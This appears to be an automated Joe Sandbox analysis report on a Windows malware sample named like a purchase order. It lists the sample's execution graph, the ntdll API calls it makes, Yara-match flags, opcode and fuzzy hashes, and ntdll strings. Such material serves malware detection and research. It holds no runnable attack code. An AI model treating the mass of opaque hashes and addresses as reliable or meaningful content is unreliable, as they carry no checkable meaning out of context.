                                                                                                                            • Opcode Fuzzy Hash: 40fb9b1ee05a26280ef6af45380a6190b55f719bdd360a0e1e7a129f122987ce
                                                                                                                            • Instruction Fuzzy Hash: 7251FEB4E0025A8FCB14DFA9D5805AEBBF2FF89304F24C169D418AB355D734A942CFA5

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:1.2%
                                                                                                                            Dynamic/Decrypted Code Coverage:4.8%
                                                                                                                            Signature Coverage:8.8%
                                                                                                                            Total number of Nodes:147
                                                                                                                            Total number of Limit Nodes:10
                                                                                                                            execution_graph 92865 42fb03 92866 42fb13 92865->92866 92867 42fb19 92865->92867 92870 42eb43 92867->92870 92869 42fb3f 92873 42ccf3 92870->92873 92872 42eb5e 92872->92869 92874 42cd0d 92873->92874 92875 42cd1e RtlAllocateHeap 92874->92875 92875->92872 92876 425023 92877 42503c 92876->92877 92886 4289b3 92877->92886 92879 4250cc 92880 425087 92891 42ea63 92880->92891 92883 425059 92883->92879 92883->92880 92884 4250c7 92883->92884 92885 42ea63 RtlFreeHeap 92884->92885 92885->92879 92888 428a17 92886->92888 92887 428a4e 92887->92883 92888->92887 92894 424d33 92888->92894 92890 428a30 92890->92883 92909 42cd43 92891->92909 92893 425097 92895 424ccf 92894->92895 92896 424cd7 92895->92896 92897 424ceb 92895->92897 92903 424d78 92895->92903 92899 42c9c3 NtClose 92896->92899 92905 42c9c3 92897->92905 92901 424ce0 92899->92901 92900 424cf4 92908 42eb83 RtlAllocateHeap 92900->92908 92901->92890 92903->92890 92904 424cff 92904->92890 92906 42c9e0 92905->92906 92907 42c9f1 NtClose 92906->92907 92907->92900 92908->92904 92910 42cd5d 92909->92910 92911 42cd6e RtlFreeHeap 92910->92911 92911->92893 92912 42bfc3 92913 42bfe0 92912->92913 92916 1bd2df0 LdrInitializeThunk 92913->92916 92914 42c008 92916->92914 92917 41e783 92918 41e7a9 92917->92918 92922 41e8a3 92918->92922 92923 42fc33 92918->92923 92920 41e841 92920->92922 92929 42c013 92920->92929 92924 42fba3 92923->92924 92925 42fc00 92924->92925 92926 42eb43 RtlAllocateHeap 92924->92926 92925->92920 92927 42fbdd 92926->92927 92928 42ea63 RtlFreeHeap 92927->92928 92928->92925 92930 42c030 92929->92930 92933 1bd2c0a 92930->92933 92931 42c05c 92931->92922 92934 1bd2c1f LdrInitializeThunk 92933->92934 92935 1bd2c11 92933->92935 92934->92931 92935->92931 93021 413d53 93024 42cc53 93021->93024 93025 42cc70 93024->93025 93028 1bd2c70 LdrInitializeThunk 93025->93028 93026 413d72 93028->93026 93029 41b573 93030 41b5b7 93029->93030 93031 41b5d8 93030->93031 93032 42c9c3 NtClose 93030->93032 93032->93031 93033 4142b3 93034 4142cd 93033->93034 93039 417a63 93034->93039 93036 4142eb 93037 414330 93036->93037 93038 41431f PostThreadMessageW 93036->93038 93038->93037 93040 417a87 93039->93040 93041 417a8e 93040->93041 93043 417aad 93040->93043 93046 42fee3 LdrLoadDll 93040->93046 93041->93036 93044 417ada 93043->93044 93045 417ad1 LdrLoadDll 93043->93045 93044->93036 93045->93044 93046->93043 92936 401a44 92937 401a53 92936->92937 92940 42ffd3 92937->92940 92943 42e623 92940->92943 92944 42e649 92943->92944 92955 407563 92944->92955 92946 42e65f 92954 401ac9 92946->92954 92958 41b383 92946->92958 92948 42e67e 92951 42e693 92948->92951 92973 42cd93 92948->92973 92969 428553 92951->92969 92952 42e6ad 92953 42cd93 ExitProcess 92952->92953 92953->92954 92957 407570 92955->92957 92976 416713 92955->92976 92957->92946 92959 41b3af 92958->92959 92989 41b273 92959->92989 92962 41b3f4 92965 41b410 92962->92965 92967 42c9c3 NtClose 92962->92967 92963 41b3dc 92964 41b3e7 92963->92964 92966 42c9c3 NtClose 92963->92966 92964->92948 92965->92948 92966->92964 92968 41b406 92967->92968 92968->92948 92970 4285b5 92969->92970 92972 4285c2 92970->92972 93000 4188c3 92970->93000 92972->92952 92974 42cdad 92973->92974 92975 42cdbe ExitProcess 92974->92975 92975->92951 92977 41672a 92976->92977 92979 416743 92977->92979 92980 42d403 92977->92980 92979->92957 92981 42d41d 92980->92981 92982 4289b3 2 API calls 92981->92982 92984 42d443 92982->92984 92983 42d44c 92983->92979 92984->92983 92985 42c013 LdrInitializeThunk 92984->92985 92986 42d4a9 92985->92986 92987 42ea63 RtlFreeHeap 92986->92987 92988 42d4bf 92987->92988 92988->92979 92990 41b369 92989->92990 92991 41b28d 92989->92991 92990->92962 92990->92963 92995 42c0b3 92991->92995 92994 42c9c3 NtClose 92994->92990 92996 42c0d0 92995->92996 92999 1bd35c0 LdrInitializeThunk 92996->92999 92997 41b35d 92997->92994 92999->92997 93002 4188ed 93000->93002 93001 418deb 93001->92972 93002->93001 93008 413f33 93002->93008 93004 418a1a 93004->93001 93005 42ea63 RtlFreeHeap 93004->93005 93006 418a32 93005->93006 93006->93001 93007 42cd93 ExitProcess 93006->93007 93007->93001 93009 413f53 93008->93009 93011 413fbc 93009->93011 93013 41b693 NtClose RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 93009->93013 93011->93004 93012 413fb2 93012->93004 93013->93012 93014 419005 93015 42c9c3 NtClose 93014->93015 93016 41900f 93015->93016 93017 414966 93018 41496a 93017->93018 93019 4289b3 2 API calls 93018->93019 93020 414983 93019->93020 93047 1bd2b60 LdrInitializeThunk

                                                                                                                            Executed Functions

                                                                                                                            Function 00417A63 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 73 417a63-417a7f 74 417a87-417a8c 73->74 75 417a82 call 42f643 73->75 76 417a92-417aa0 call 42fc43 74->76 77 417a8e-417a91 74->77 75->74 80 417ab0-417ac1 call 42e0f3 76->80 81 417aa2-417aad call 42fee3 76->81 86 417ac3-417ad7 LdrLoadDll 80->86 87 417ada-417add 80->87 81->80 86->87
                                                                                                                            APIs
                                                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417AD5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2124637174.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_400000_PO -2025918.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Load
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2234796835-0
                                                                                                                            • Opcode ID: 796422a0e03da6e05e870b9df345f99345e8cc58a3a3a3b03bc6c72230115a90
                                                                                                                            • Instruction ID: 0800c33516af0022d0b17055a186c9f0e9460697c5db4936c8195cfb473c91ec
                                                                                                                            • Opcode Fuzzy Hash: 796422a0e03da6e05e870b9df345f99345e8cc58a3a3a3b03bc6c72230115a90
                                                                                                                            • Instruction Fuzzy Hash: E00175B1E0010DABDF10DBE1DC42FDEB378AF54308F4081A6E90897241F674EB588B55
                                                                                                                            Function 0042C9C3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 99 42c9c3-42c9ff call 404993 call 42dbe3 NtClose
                                                                                                                            APIs
                                                                                                                            • NtClose.NTDLL(00424CF4,?,-665E6599,?,?,00424CF4,?,00009D57), ref: 0042C9FA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2124637174.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_400000_PO -2025918.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Close
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3535843008-0
                                                                                                                            • Opcode ID: 9b38cc4083fcf95519bbd2f222b190f3b983931ae5abd193463e60ae3ae6f940
                                                                                                                            • Instruction ID: eb656e4eeb6cc65563beea3f5f9dfeb29813091517ec9c3f1aba9bd37f9daa79
                                                                                                                            • Opcode Fuzzy Hash: 9b38cc4083fcf95519bbd2f222b190f3b983931ae5abd193463e60ae3ae6f940
                                                                                                                            • Instruction Fuzzy Hash: 2CE04F756042147BD220AA6ADC41F9B775CDBC9714F508069FA0C67242C675791187B4
                                                                                                                            Function 01BD2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 113 1bd2b60-1bd2b6c LdrInitializeThunk
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: b4497021f95067a5342054bbf48b56fcb666dfe8f08f16087023e02995661390
                                                                                                                            • Instruction ID: 63798e90fc3bd1ffb756386bedc86f63b267561818c3d63d0685153cec8ac104
                                                                                                                            • Opcode Fuzzy Hash: b4497021f95067a5342054bbf48b56fcb666dfe8f08f16087023e02995661390
                                                                                                                            • Instruction Fuzzy Hash: 3690026220280003410971584418616404A97E0201B55D061E1014591DC72989916225
                                                                                                                            Function 01BD2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 115 1bd2df0-1bd2dfc LdrInitializeThunk
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 0f04feef61110b6fee979fa3e31243b34a7dc8cbc0a54126596c65b7b964c078
                                                                                                                            • Instruction ID: 118d449a6b19e59ce00ae6c0980ba4a016ad50030ae0fc6b17eeb6d63e20096f
                                                                                                                            • Opcode Fuzzy Hash: 0f04feef61110b6fee979fa3e31243b34a7dc8cbc0a54126596c65b7b964c078
                                                                                                                            • Instruction Fuzzy Hash: 3C90023220180413D11571584508707004997D0241F95D452A0424559DD75A8A52A221
                                                                                                                            Function 01BD2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 114 1bd2c70-1bd2c7c LdrInitializeThunk
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 1905437c9a7a825a2e024dafa51447ca18cb67a1f4ad8c30aa150cf3eedf1ce7
                                                                                                                            • Instruction ID: 874c6369d71ae7a67ea833f54140f8107c603d68d92ecb3421fe5b732057dd4c
                                                                                                                            • Opcode Fuzzy Hash: 1905437c9a7a825a2e024dafa51447ca18cb67a1f4ad8c30aa150cf3eedf1ce7
                                                                                                                            • Instruction Fuzzy Hash: 7E90023220188802D1147158840874A004597D0301F59D451A4424659DC79989917221
                                                                                                                            Function 01BD35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 116 1bd35c0-1bd35cc LdrInitializeThunk
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: c3705c77b6b3aad5990cd2afddcf2ab1d877f4e06a96a8e0d63f9b8539928445
                                                                                                                            • Instruction ID: 43081c7f3b5c37e11f5f9419a2958a46fdb29699fc6bbbb6e2fc87d8ad1c747d
                                                                                                                            • Opcode Fuzzy Hash: c3705c77b6b3aad5990cd2afddcf2ab1d877f4e06a96a8e0d63f9b8539928445
                                                                                                                            • Instruction Fuzzy Hash: 5B90023260590402D10471584518706104597D0201F65D451A0424569DC7998A5166A2
                                                                                                                            Function 004142B3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • PostThreadMessageW.USER32(-4108694,00000111,00000000,00000000), ref: 0041432A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2124637174.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_400000_PO -2025918.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: MessagePostThread
                                                                                                                            • String ID: -4108694$-4108694
                                                                                                                            • API String ID: 1836367815-789369925
                                                                                                                            • Opcode ID: d6fd4bfa657c404ea0306360972ecf2cd5ee9aeebf6a95fb03983e269b39b940
                                                                                                                            • Instruction ID: 8fc2ccc715d75f3af949a42b15c9b6a00aa3033adc5e71ade82c91b44118cde9
                                                                                                                            • Opcode Fuzzy Hash: d6fd4bfa657c404ea0306360972ecf2cd5ee9aeebf6a95fb03983e269b39b940
                                                                                                                            • Instruction Fuzzy Hash: 3301D6B1D0021C7ADB11AAE19CC1DEFBB7CDF41798F448069FA14B7241D6785E0687A5
                                                                                                                            Function 00417AE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71libraryloaderCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 14 417ae3-417aec 15 417ad1-417ad7 LdrLoadDll 14->15 16 417aee-417aef 14->16 19 417ada-417add 15->19 17 417af1-417af6 16->17 18 417a98-417aa0 16->18 20 417af8-417b08 17->20 21 417b0f 17->21 22 417ab0-417ac1 call 42e0f3 18->22 23 417aa2-417aad call 42fee3 18->23 20->21 24 417b11-417b29 21->24 22->19 31 417ac3-417ad0 22->31 23->22 24->24 28 417b2b-417b3b 24->28 31->15
                                                                                                                            APIs
                                                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417AD5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2124637174.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_400000_PO -2025918.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Load
                                                                                                                            • String ID: axD3
                                                                                                                            • API String ID: 2234796835-3556351365
                                                                                                                            • Opcode ID: 878dfedd390b4e169c5c909b9aebd42986a9202124793dd2abb74fc700858bd0
                                                                                                                            • Instruction ID: 5f15b57304db88241ac4cc0d6c6d2276f5506b99c897ca4869340483d7a91710
                                                                                                                            • Opcode Fuzzy Hash: 878dfedd390b4e169c5c909b9aebd42986a9202124793dd2abb74fc700858bd0
                                                                                                                            • Instruction Fuzzy Hash: 94118671A442066BE700CBA5CC42BDFB7B8DF04768F14822AED2597281E374EA46C795
                                                                                                                            Function 0042CCF3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 89 42ccf3-42cd34 call 404993 call 42dbe3 RtlAllocateHeap
                                                                                                                            APIs
                                                                                                                            • RtlAllocateHeap.NTDLL(00000104,?,00424CFF,?,?,00424CFF,?,00000104,?,00009D57), ref: 0042CD2F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2124637174.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_400000_PO -2025918.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1279760036-0
                                                                                                                            • Opcode ID: 8af235827bdae546ae595d1eb37e2a3b6d82698474d1be62dc12886f45d2914b
                                                                                                                            • Instruction ID: cb442fef8ab787463d58d4e17d22a99d0027002ea8d48f12f6d2fc59108ae3c9
                                                                                                                            • Opcode Fuzzy Hash: 8af235827bdae546ae595d1eb37e2a3b6d82698474d1be62dc12886f45d2914b
                                                                                                                            • Instruction Fuzzy Hash: 9FE06DB56042047BD620EF59EC41E9B77ACDFC8710F004019FA08A7241C675BD11CBB8
                                                                                                                            Function 0042CD43 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 94 42cd43-42cd84 call 404993 call 42dbe3 RtlFreeHeap
                                                                                                                            APIs
                                                                                                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,F845C700,00000007,00000000,00000004,00000000,004172CE,000000F4), ref: 0042CD7F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2124637174.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_400000_PO -2025918.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3298025750-0
                                                                                                                            • Opcode ID: dab1178799a105d25c6e3316018af06c701a3083eb78f3c61f33bb5845b2359f
                                                                                                                            • Instruction ID: 7395edaf297d5e7ca3aa9e3b0020c32f778f50e7afa72829ba8406197be42610
                                                                                                                            • Opcode Fuzzy Hash: dab1178799a105d25c6e3316018af06c701a3083eb78f3c61f33bb5845b2359f
                                                                                                                            • Instruction Fuzzy Hash: 2DE06DB66083047BD610EF59DC41F9B37ACDFC8710F004019FA08A7241C675B9108BB8
                                                                                                                            Function 0042CD93 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 104 42cd93-42cdcc call 404993 call 42dbe3 ExitProcess
                                                                                                                            APIs
                                                                                                                            • ExitProcess.KERNEL32(?,00000000,00000000,?,9C41AA96,?,?,9C41AA96), ref: 0042CDC7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2124637174.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_400000_PO -2025918.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ExitProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 621844428-0
                                                                                                                            • Opcode ID: 8b44ef5fd1ac1b24815c7711b62f7492f91eceab24c3cb0b3cc850fa7ca7bbda
                                                                                                                            • Instruction ID: e9a4047e2e6157e7cf64b94a01f01a68d25e3d9aa703a6ddb621b4b25ad1c7a6
                                                                                                                            • Opcode Fuzzy Hash: 8b44ef5fd1ac1b24815c7711b62f7492f91eceab24c3cb0b3cc850fa7ca7bbda
                                                                                                                            • Instruction Fuzzy Hash: 8AE04F752002147BC520AA5ADC01F9B775CDFC5714F40402AFA08AB242C670B90087B5
                                                                                                                            Function 01BD2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 109 1bd2c0a-1bd2c0f 110 1bd2c1f-1bd2c26 LdrInitializeThunk 109->110 111 1bd2c11-1bd2c18 109->111
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: eba0eb9e6e2d72965db739543e207443a7a1424afe6ccbcd22c370a9b43dd9ba
                                                                                                                            • Instruction ID: 47430e6598fe4e59f5466fed0bbcffdb4501749a8024fd59671f4a62dc181922
                                                                                                                            • Opcode Fuzzy Hash: eba0eb9e6e2d72965db739543e207443a7a1424afe6ccbcd22c370a9b43dd9ba
                                                                                                                            • Instruction Fuzzy Hash: E7B09B729019C5C5DA1AE764460C7177940B7D0701F19C0E1D2030642F473CC5D1E375

                                                                                                                            Non-executed Functions

                                                                                                                            Function 01C12349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                            • API String ID: 0-2160512332
                                                                                                                            • Opcode ID: 0e8a75db273fb3993fad15819f6c585139799bb25c6b2076cb987558c665cbb8
                                                                                                                            • Instruction ID: 7b55f8c536e802feeec81f7a067b3337c6bbc25a686ac72c18bfbdb77b1c4b78
                                                                                                                            • Opcode Fuzzy Hash: 0e8a75db273fb3993fad15819f6c585139799bb25c6b2076cb987558c665cbb8
                                                                                                                            • Instruction Fuzzy Hash: CD92FF75688382EFE725DF28C880B6BB7E8BB85714F20481DFA94D7250D770E944DB92
                                                                                                                            Function 01BC8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • double initialized or corrupted critical section, xrefs: 01C05508
                                                                                                                            • 8, xrefs: 01C052E3
                                                                                                                            • Invalid debug info address of this critical section, xrefs: 01C054B6
                                                                                                                            • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01C0540A, 01C05496, 01C05519
                                                                                                                            • Thread identifier, xrefs: 01C0553A
                                                                                                                            • Thread is in a state in which it cannot own a critical section, xrefs: 01C05543
                                                                                                                            • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01C054E2
                                                                                                                            • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01C054CE
                                                                                                                            • Critical section address., xrefs: 01C05502
                                                                                                                            • undeleted critical section in freed memory, xrefs: 01C0542B
                                                                                                                            • Address of the debug info found in the active list., xrefs: 01C054AE, 01C054FA
                                                                                                                            • Critical section debug info address, xrefs: 01C0541F, 01C0552E
                                                                                                                            • corrupted critical section, xrefs: 01C054C2
                                                                                                                            • Critical section address, xrefs: 01C05425, 01C054BC, 01C05534
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                            • API String ID: 0-2368682639
                                                                                                                            • Opcode ID: c538c602984d95fc1c751c60b4102b3849ee996a7420a24c7109f10cec8f9ff1
                                                                                                                            • Instruction ID: 0e8f10f512d6c53ef91cae1df3d10ee163ac1c65354eee1475a1d0a50c78404c
                                                                                                                            • Opcode Fuzzy Hash: c538c602984d95fc1c751c60b4102b3849ee996a7420a24c7109f10cec8f9ff1
                                                                                                                            • Instruction Fuzzy Hash: 3B818CB1A40358EFDB25CF9AC885BAEBBB5FB08B14F104199F514B7290D3B1A940CF60
                                                                                                                            Function 01BC29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • RtlpResolveAssemblyStorageMapEntry, xrefs: 01C0261F
                                                                                                                            • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01C02506
                                                                                                                            • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 01C024C0
                                                                                                                            • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01C02412
                                                                                                                            • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 01C022E4
                                                                                                                            • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01C02409
                                                                                                                            • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 01C025EB
                                                                                                                            • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01C02624
                                                                                                                            • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01C02602
                                                                                                                            • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01C02498
                                                                                                                            • @, xrefs: 01C0259B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                            • API String ID: 0-4009184096
                                                                                                                            • Opcode ID: 357ad1b14e828eee243dc40c054b76ac74b1fe0e2a6283fbab5ec0b9898c7def
                                                                                                                            • Instruction ID: bec2bc9c6709906caab5de13afd360196374dc03cc36fe492d57381284991d8e
                                                                                                                            • Opcode Fuzzy Hash: 357ad1b14e828eee243dc40c054b76ac74b1fe0e2a6283fbab5ec0b9898c7def
